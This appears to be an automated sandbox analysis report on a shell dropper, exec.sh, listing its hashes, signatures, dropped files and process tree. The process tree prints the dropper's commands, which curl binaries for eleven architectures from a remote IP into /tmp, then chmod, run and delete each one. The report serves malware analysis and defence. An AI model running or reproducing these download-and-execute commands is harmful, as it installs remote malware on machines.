Analysis
max time kernel: 376s
max time network: 379s
platform: debian-9_armhf
resource: debian9-armhf-20240226-en
resource tags: arch:armhf, image:debian9-armhf-20240226-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 15-03-2024 20:08
Static task: static1
Behavioral task: behavioral1 (sample exec.sh, resource ubuntu1804-amd64-20240226-en)
Behavioral task: behavioral2 (sample exec.sh, resource debian9-armhf-20240226-en)
Behavioral task: behavioral3 (sample exec.sh, resource debian9-mipsbe-20240226-en)
Behavioral task: behavioral4 (sample exec.sh, resource debian9-mipsel-20240226-en)
General
Target: exec.sh
Size: 842B
MD5: 4eeac4436b9c68f85b1c3a2bae62d3f3
SHA1: 4895bfd63ba3ae5fd97f69c4a243d4bae7eddfa1
SHA256: bfa195bd238473bfead86e74b796c4721d1f5281c284b96ff29d8806a82a6520
SHA512: e0091672dd843f9dd87b50f43c8b09711cd1b02c40a5a8e51a53878cdd213881328583e99d1d92aef5c497abdd3f181fe6f3a740aedb7d66918c05788bbd0e5b
Malware Config
Signatures
Executes dropped EXE (11 IoCs)
Processes (ioc, pid, process):
/tmp/386_binary       739  386_binary
/tmp/amd64_binary     781  amd64_binary
/tmp/arm_binary       790  arm_binary
/tmp/arm64_binary     808  arm64_binary
/tmp/mips_binary      815  mips_binary
/tmp/mips64_binary    826  mips64_binary
/tmp/mips64le_binary  838  mips64le_binary
/tmp/mipsle_binary    849  mipsle_binary
/tmp/ppc64_binary     858  ppc64_binary
/tmp/ppc64le_binary   883  ppc64le_binary
/tmp/s390x_binary     896  s390x_binary
Checks CPU configuration (1 TTP, 11 IoCs)
Checks CPU information which indicates whether the system is a virtual machine.
Processes (description, ioc, process):
File opened for reading  /proc/cpuinfo  curl  (11 occurrences, one per curl process)
Enumerates kernel/hardware configuration (1 TTP, 1 IoC)
Reads contents of the /sys virtual filesystem to enumerate system information.
Processes (description, ioc, process):
File opened for reading  /sys/kernel/mm/transparent_hugepage/hpage_pmd_size  arm_binary
Reads runtime system information (22 IoCs)
Reads data from the /proc virtual filesystem.
Processes (description, ioc, process):
File opened for reading  /proc/sys/crypto/fips_enabled  curl  (11 occurrences, one per curl process)
File opened for reading  /proc/self/auxv                curl  (11 occurrences, one per curl process)
Writes file to tmp directory (11 IoCs)
Malware often drops required files in the /tmp directory.
Processes (description, ioc, process):
File opened for modification  /tmp/mipsle_binary    curl
File opened for modification  /tmp/ppc64_binary     curl
File opened for modification  /tmp/ppc64le_binary   curl
File opened for modification  /tmp/386_binary       curl
File opened for modification  /tmp/amd64_binary     curl
File opened for modification  /tmp/arm64_binary     curl
File opened for modification  /tmp/mips64_binary    curl
File opened for modification  /tmp/mips64le_binary  curl
File opened for modification  /tmp/arm_binary       curl
File opened for modification  /tmp/mips_binary      curl
File opened for modification  /tmp/s390x_binary     curl
Processes (executable path, then command line; each spawned command is indented under the parent script, with the signatures it triggered listed beneath it)
/tmp/exec.sh  /tmp/exec.sh
  /usr/bin/curl  curl -o 386_binary http://5.10.249.153:9999/386
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/chmod  chmod +x 386_binary
  /tmp/386_binary  ./386_binary
    - Executes dropped EXE
  /bin/rm  rm -rf 386_binary
  /usr/bin/curl  curl -o amd64_binary http://5.10.249.153:9999/amd64
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/chmod  chmod +x amd64_binary
  /tmp/amd64_binary  ./amd64_binary
    - Executes dropped EXE
  /bin/rm  rm -rf amd64_binary
  /usr/bin/curl  curl -o arm_binary http://5.10.249.153:9999/arm
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/chmod  chmod +x arm_binary
  /tmp/arm_binary  ./arm_binary
    - Executes dropped EXE
    - Enumerates kernel/hardware configuration
  /bin/rm  rm -rf arm_binary
  /usr/bin/curl  curl -o arm64_binary http://5.10.249.153:9999/arm64
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/chmod  chmod +x arm64_binary
  /tmp/arm64_binary  ./arm64_binary
    - Executes dropped EXE
  /bin/rm  rm -rf arm64_binary
  /usr/bin/curl  curl -o mips_binary http://5.10.249.153:9999/mips
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/chmod  chmod +x mips_binary
  /tmp/mips_binary  ./mips_binary
    - Executes dropped EXE
  /bin/rm  rm -rf mips_binary
  /usr/bin/curl  curl -o mips64_binary http://5.10.249.153:9999/mips64
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/chmod  chmod +x mips64_binary
  /tmp/mips64_binary  ./mips64_binary
    - Executes dropped EXE
  /bin/rm  rm -rf mips64_binary
  /usr/bin/curl  curl -o mips64le_binary http://5.10.249.153:9999/mips64le
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/chmod  chmod +x mips64le_binary
  /tmp/mips64le_binary  ./mips64le_binary
    - Executes dropped EXE
  /bin/rm  rm -rf mips64le_binary
  /usr/bin/curl  curl -o mipsle_binary http://5.10.249.153:9999/mipsle
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/chmod  chmod +x mipsle_binary
  /tmp/mipsle_binary  ./mipsle_binary
    - Executes dropped EXE
  /bin/rm  rm -rf mipsle_binary
  /usr/bin/curl  curl -o ppc64_binary http://5.10.249.153:9999/ppc64
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/chmod  chmod +x ppc64_binary
  /tmp/ppc64_binary  ./ppc64_binary
    - Executes dropped EXE
  /bin/rm  rm -rf ppc64_binary
  /usr/bin/curl  curl -o ppc64le_binary http://5.10.249.153:9999/ppc64le
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/chmod  chmod +x ppc64le_binary
  /tmp/ppc64le_binary  ./ppc64le_binary
    - Executes dropped EXE
  /bin/rm  rm -rf ppc64le_binary
  /usr/bin/curl  curl -o s390x_binary http://5.10.249.153:9999/s390x
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  /bin/chmod  chmod +x s390x_binary
  /tmp/s390x_binary  ./s390x_binary
    - Executes dropped EXE
  /bin/rm  rm -rf s390x_binary
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads (dropped file, size)
/tmp/386_binary       96KB
/tmp/amd64_binary     340KB
/tmp/arm64_binary     68KB
/tmp/arm_binary       904KB
/tmp/mips64_binary    344KB
/tmp/mips64le_binary  56KB
/tmp/mips_binary      76KB
/tmp/mipsle_binary    160KB
/tmp/ppc64_binary     176KB
/tmp/ppc64le_binary   460KB
/tmp/s390x_binary     1.0MB